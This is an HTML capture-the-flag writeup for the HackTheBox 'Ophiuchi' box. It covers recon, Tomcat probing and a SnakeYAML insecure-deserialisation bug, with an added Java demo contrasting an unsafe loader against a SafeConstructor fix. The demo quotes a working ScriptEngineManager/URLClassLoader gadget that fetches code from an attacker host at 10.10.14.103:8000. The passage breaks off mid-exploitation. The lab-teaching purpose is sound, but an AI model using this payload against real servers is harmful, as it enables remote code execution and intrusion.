<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Ophiuchi - HackTheBox Writeup (10.10.10.227) | [email protected]~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Ophiuchi - HackTheBox Writeup (10.10.10.227)">
<meta name="description" content="Medium-difficulty Linux box on exploiting an insecure deserialisation vulnerability in a SnakeYAML-backed servlet. Privilege escalation by reverse-engineering and forging a deploy-ready WebAssembly binary to exploit a command injection vulnerability in the deploy script.">
<meta property="og:description" content="Medium-difficulty Linux box on exploiting an insecure deserialisation vulnerability in a SnakeYAML-backed servlet. Privilege escalation by reverse-engineering and forging a deploy-ready WebAssembly binary to exploit a command injection vulnerability in the deploy script.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/82b3289bbabf88da886bc9f45802ac17.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/82b3289bbabf88da886bc9f45802ac17.png"></span>
</div>
<h1 class="Header__Title">Ophiuchi - HackTheBox Writeup (10.10.10.227)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Sat, Jul 17, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Medium">Medium</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Insecure_Deserialisation">Insecure Deserialisation</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--brown">
<a href="tag/WebAssembly">WebAssembly</a>
</span>
</div>
<div>
Medium-difficulty Linux box on exploiting an insecure deserialisation vulnerability in a SnakeYAML-backed servlet. Privilege escalation by reverse-engineering and forging a deploy-ready WebAssembly binary to exploit a command injection vulnerability in the deploy script.
</div>
</header>
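<p>The description above names the bug this box is built around: a Tomcat servlet that hands user input straight to SnakeYAML's <code>Yaml.load()</code>. As an added example, not code from the writeup or from the box itself, the block below puts that vulnerable loader next to its hardened <code>SafeConstructor</code> form and runs both on a benign <code>!!java.net.URL</code> tag (constructing a <code>URL</code> object does no network I/O), so it can be tried offline. SnakeYAML 1.x on the classpath and the class, method and constant names are assumptions for illustration.</p>

```java
// Added example, not code from the writeup or from the Ophiuchi box.
// Assumes SnakeYAML 1.x (org.yaml:snakeyaml) on the classpath; the class,
// method and constant names below are illustrative.
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class YamlParserDemo {

    // Vulnerable pattern (what Servlet.doPost -> Yaml.load in the stack trace
    // implies): new Yaml() uses the default Constructor, which resolves a
    // global tag such as !!java.net.URL to that class and instantiates it
    // with the sequence elements as constructor arguments.
    static Object parseUnsafe(String yaml) {
        return new Yaml().load(yaml);
    }

    // Hardened form: SafeConstructor only knows the core YAML types (maps,
    // sequences, scalars), so any !!class tag is rejected before any class
    // is looked up. SnakeYAML 2.x spells this
    // new Yaml(new SafeConstructor(new LoaderOptions())).
    static Object parseSafe(String yaml) {
        return new Yaml(new SafeConstructor()).load(yaml);
    }

    // Benign probe: building a java.net.URL does no network I/O, but it shows
    // that the tag, not the application, chooses which class is constructed.
    static final String PROBE =
        "!!java.net.URL [\"http://10.10.14.103:8000/owata.html\"]";

    // The gadget the writeup submits, kept here for reference only. Loading it
    // through parseUnsafe() would make the JVM fetch the URL, because
    // ScriptEngineManager(ClassLoader) runs ServiceLoader over the supplied
    // URLClassLoader looking for ScriptEngineFactory providers.
    static final String GADGET =
        "!!javax.script.ScriptEngineManager [\n"
      + "  !!java.net.URLClassLoader [[\n"
      + "    !!java.net.URL [\"http://10.10.14.103:8000/owata.html\"]\n"
      + "  ]]\n"
      + "]";

    public static void main(String[] args) {
        // Default loader: the tag wins and we get a java.net.URL instance back.
        Object built = parseUnsafe(PROBE);
        System.out.println("unsafe loader built: " + built.getClass().getName());

        // Safe loader: the same input fails before any class is touched.
        try {
            parseSafe(PROBE);
            System.out.println("safe loader accepted the tag (unexpected)");
        } catch (YAMLException e) {
            System.out.println("safe loader rejected it: " + e.getMessage().trim());
        }

        // Ordinary data, like the form's JSON, still parses with the safe loader.
        System.out.println(parseSafe("{\"hello\": \"there\", \"how\": \"are you\"}"));
    }
}
```

<p>Compile with the SnakeYAML jar on the classpath (for example <code>javac -cp snakeyaml-1.27.jar YamlParserDemo.java</code>). The unsafe loader reports that it built a <code>java.net.URL</code>, the safe loader throws a <code>ConstructorException</code> saying it could not determine a constructor for the tag, and the JSON map still loads. Note that the fix is the constructor choice, not input filtering: the form's "on hold" message seen later in the writeup is a response-side cosmetic that does nothing to stop <code>Yaml.load()</code> from running first.</p>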
<article id="https://www.notion.so/09dfee72ef994b07811a5df6ce84776c" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/d77bfc29aa1744c08626fddc5a6a6e30" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/d77bfc29aa1744c08626fddc5a6a6e30"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/b9241683299e4081ac19fbbbc5c851ee" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/c131a9ed1ea14bd88bd1eb62b29dda32" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.227 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/c45bd0a372384fd992200a6f455a7c38" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy</span></span></span></code></pre></li><li id="https://www.notion.so/b45bbb15a06a430aaa0c2e8c9d0ad103" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/8dc28f5b671a4e9a83e137d9854fe159" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,8080 10.10.10.227 > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/aabf975d9d694097a6f22c9e39f3f34a" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
| 256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_ 256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open http Apache Tomcat 9.0.38
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span></span></code></pre><div id="https://www.notion.so/46fff2f0f2424e6996737994ed591937" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">OpenSSH 8.2p1 Ubuntu 4ubuntu0.1, Apache Tomcat 9.0.38</span></span></p></div></li></ul><h2 id="https://www.notion.so/55954a8be6264bd9b583ac902528451b" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/55954a8be6264bd9b583ac902528451b"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/2c54f7d8497846af9961f8b1eac70698" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Add vhost to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/hosts</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/12cf9871b84b421aae502ee121e8045e" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.227 ophiuchi.htb</span></span></span></code></pre></li></ul>
<div id="https://www.notion.so/41fc23f0e0554363b2212fc8f28d0ce9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP Enumeration</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/a11e0d883fe7489a9d0b04158500a9e7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The website is an online YAML parser, which is a likely vector for a deserialisation attack.</span></span><div id="https://www.notion.so/27baa1f8d724400b971e24b3504735b0" class="Image Image--Normal"><figure><a href="https://i.imgur.com/zZkm6Oo.png?width=912"><img src="https://i.imgur.com/zZkm6Oo.png?width=912" style="width:912px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div></li><li id="https://www.notion.so/1d6b24b04a524e9aa8b6843696b9a722" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Brute-forcing directories with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">gobuster</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/d279a85d54654a59ab1b7eec1ccded52" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -u http://10.10.10.227:8080/ -w ../Common/directory-list-2.3-medium.txt -x .php,.html</code></span></span></p></div></li><li id="https://www.notion.so/ea485fd74d7d4a6e81897ed6311732d9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found the Tomcat Manager panel:</span></span><div id="https://www.notion.so/eab3aef591e54ad2a513001ff2a56859" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://ophiuchi.htb:8080/manager/html">http://ophiuchi.htb:8080/manager/html</a></span></span></p></div></li>
<li id="https://www.notion.so/207c4c0dcc9046c9afe8d98080316f74" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After failing the Basic-auth login prompt, we get the message:</span></span><pre id="https://www.notion.so/4357f870411446468d6301f24cd7b321" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>You are not authorized to view this page. If you have not changed any configuration files, please examine the file conf/tomcat-users.xml in your installation. That file must contain the credentials to let you use this webapp.
For example, to add the manager-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>role</span> <span class="token attr-name">rolename</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>manager-gui<span class="token punctuation">"</span></span><span class="token punctuation">/></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>user</span> <span class="token attr-name">username</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>tomcat<span class="token punctuation">"</span></span> <span class="token attr-name">password</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>s3cret<span class="token punctuation">"</span></span> <span class="token attr-name">roles</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>manager-gui<span class="token punctuation">"</span></span><span class="token punctuation">/></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/281b857bc28c4abfb002c5b79c0eab46" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The credentials needed to access the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/manager</code></span><span class="SemanticString"> page are stored on the server in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">conf/tomcat-users.xml</code></span></span></li><li id="https://www.notion.so/25ae058ba67041389b7af98eb494db0e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Probing the manager page with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dirbuster</code></span><span class="SemanticString"> reveals the Basic-auth realm name:</span></span><pre id="https://www.notion.so/c4657f91594541859773809c58d0b0d2" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Mar 07, 2021 8:48:44 PM org.apache.commons.httpclient.HttpMethodDirector 
processWWWAuthChallenge
INFO: No credentials available for BASIC 'Tomcat Manager Application'@10.10.10.227:8080</span></span></span></code></pre></li><li id="https://www.notion.so/7bc1d89864634028ba1057ebdac530cd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Submitting data on the YAML parser page sends it to </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://10.10.10.227:8080/Servlet">http://10.10.10.227:8080/Servlet</a></span><span class="SemanticString">, and the server responds with:</span></span><pre id="https://www.notion.so/e4d8f2a536d44d15bfcf652a80514b48" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Due to security reason this feature has been temporarily on hold. We will soon fix the issue!</span></span></span></code></pre></li><li id="https://www.notion.so/4d24da4c7ac44dd68a05fbc2166f0c11" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The parser feature looks "on hold", but a message in the response does not mean our input was not deserialised before that message was produced.</span></span></li><li id="https://www.notion.so/b22e87be2f774e69b8e27d1462583237" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Intercepting the parser's POST request with Burp Suite:</span></span><pre id="https://www.notion.so/bc44e21da4164bef8de3098f8c18e8af" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>POST /Servlet HTTP/1.1
Host: 10.10.10.227:8080
Content-Length: 67
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://10.10.10.227:8080/"><span>http://10.10.10.227:8080</span></a></span><span class="SemanticString"><span>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,</span></span><span class="SemanticString"><em class="SemanticString__Fragment SemanticString__Fragment--Italic"><span>/</span></em></span><span class="SemanticString"><span>;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://10.10.10.227:8080/"><span>http://10.10.10.227:8080/</span></a></span><span class="SemanticString"><span>
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=3E409C2627922DEF55DAFEB93DEC71B6
Connection: close
data=%7B%22hello%22%3A+%22there%22%2C+%22how%22%3A+%22are+you%22%7D</span></span></span></code></pre></li><li id="https://www.notion.so/4d267b0331444a65a632b0bd7c28f604" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Technically speaking, YAML (1.2) is a superset of JSON, so the JSON the form sends is valid input for a YAML parser; to tell which parser is behind it, we need input that is valid YAML but not JSON.</span></span></li><li id="https://www.notion.so/45252bea512640b7b9a2391a50133c86" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After entering the special characters </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">!!</code></span><span class="SemanticString"> (the start of a YAML global tag), we get an HTTP 500 response with a stack trace instead of the normal redirect:</span></span><pre id="https://www.notion.so/09a4455b053a49aebcb8bb0c2227bc4b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">while</span> scanning a tag
in <span class="token char">'string'</span><span class="token punctuation">,</span> line <span class="token number">1</span><span class="token punctuation">,</span> column <span class="token number">1</span><span class="token operator">:</span>
<span class="token operator">!</span><span class="token operator">!</span>
<span class="token operator">^</span>
expected <span class="token constant">URI</span><span class="token punctuation">,</span> but found <span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
in <span class="token char">'string'</span><span class="token punctuation">,</span> line <span class="token number">1</span><span class="token punctuation">,</span> column <span class="token number">3</span><span class="token operator">:</span>
<span class="token operator">!</span><span class="token operator">!</span>
<span class="token operator">^</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">scanTagUri</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">2158</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">scanTag</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">1537</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">fetchTag</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">954</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">fetchMoreTokens</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">372</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">checkToken</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">227</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>parser<span class="token punctuation">.</span></span>ParserImpl</span>$<span class="token class-name">ParseImplicitDocumentStart</span><span class="token punctuation">.</span><span class="token function">produce</span><span class="token punctuation">(</span><span class="token class-name">ParserImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">195</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>parser<span class="token punctuation">.</span></span>ParserImpl</span><span class="token punctuation">.</span><span class="token function">peekEvent</span><span class="token punctuation">(</span><span class="token class-name">ParserImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">158</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>parser<span class="token punctuation">.</span></span>ParserImpl</span><span class="token punctuation">.</span><span class="token function">checkEvent</span><span class="token punctuation">(</span><span class="token class-name">ParserImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">148</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>composer<span class="token punctuation">.</span></span>Composer</span><span class="token punctuation">.</span><span class="token function">getSingleNode</span><span class="token punctuation">(</span><span class="token class-name">Composer</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">118</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>constructor<span class="token punctuation">.</span></span>BaseConstructor</span><span class="token punctuation">.</span><span class="token function">getSingleData</span><span class="token punctuation">(</span><span class="token class-name">BaseConstructor</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">150</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span></span>Yaml</span><span class="token punctuation">.</span><span class="token function">loadFromReader</span><span class="token punctuation">(</span><span class="token class-name">Yaml</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">490</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span></span>Yaml</span><span class="token punctuation">.</span><span class="token function">load</span><span class="token punctuation">(</span><span class="token class-name">Yaml</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">416</span><span class="token punctuation">)</span>
<span class="token class-name">Servlet</span><span class="token punctuation">.</span><span class="token function">doPost</span><span class="token punctuation">(</span><span class="token class-name">Servlet</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">15</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">javax<span class="token punctuation">.</span>servlet<span class="token punctuation">.</span>http<span class="token punctuation">.</span></span>HttpServlet</span><span class="token punctuation">.</span><span class="token function">service</span><span class="token punctuation">(</span><span class="token class-name">HttpServlet</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">652</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">javax<span class="token punctuation">.</span>servlet<span class="token punctuation">.</span>http<span class="token punctuation">.</span></span>HttpServlet</span><span class="token punctuation">.</span><span class="token function">service</span><span class="token punctuation">(</span><span class="token class-name">HttpServlet</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">733</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>apache<span class="token punctuation">.</span>tomcat<span class="token punctuation">.</span>websocket<span class="token punctuation">.</span>server<span class="token punctuation">.</span></span>WsFilter</span><span class="token punctuation">.</span><span class="token function">doFilter</span><span class="token punctuation">(</span><span class="token class-name">WsFilter</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">53</span><span class="token punctuation">)</span></span></span></span></code></pre></li><li id="https://www.notion.so/52962d3f9ded426aa2ffa943a6ecbeb7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The stack trace tells us that the YAML is parsed by SnakeYAML, and that </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Servlet.doPost</code></span><span class="SemanticString"> passes our input straight to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Yaml.load()</code></span><span class="SemanticString">. A </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Yaml</code></span><span class="SemanticString"> instance built with the default constructor instantiates whatever class a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">!!</code></span><span class="SemanticString"> tag names, so a deserialisation attack is the next thing to try.</span></span></li></ul><h2 id="https://www.notion.so/09571ed36434451fa3e27e20bcfa7525" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/09571ed36434451fa3e27e20bcfa7525"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><div id="https://www.notion.so/e2b318e3a4014554a565b71a6a5963ef" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">SnakeYAML Deserialisation Attack</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/b242ae9d9f4647b3a975537afa468244" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">SnakeYAML's global tag syntax, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">!!fully.qualified.ClassName [args]</code></span><span class="SemanticString">, tells its default constructor to instantiate that Java class while loading the document, with the sequence elements passed as constructor arguments. Any class on the server's classpath can therefore be constructed with attacker-chosen arguments.</span></span></li><li id="https://www.notion.so/094b1df7238b48e7a9c545fc7a6c534a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Chained with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">javax.script.ScriptEngineManager</code></span><span class="SemanticString">, whose constructor uses </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ServiceLoader</code></span><span class="SemanticString"> to load </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ScriptEngineFactory</code></span><span class="SemanticString"> implementations from a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">URLClassLoader</code></span><span class="SemanticString"> we control, this gives the attacker remote code execution on the server.</span></span></li><li id="https://www.notion.so/dfe67edadfda4ebbb247ac6ead42703e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Host an HTTP server to capture requests:</span></span><div id="https://www.notion.so/8f48c2eba1114e38afb574d2f5a04325" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python -m http.server</code></span></span></p></div></li><li id="https://www.notion.so/7cbb7d97968b449ebace157fd8023b1c" class="BulletedList"><span class="SemanticStringArray"><span 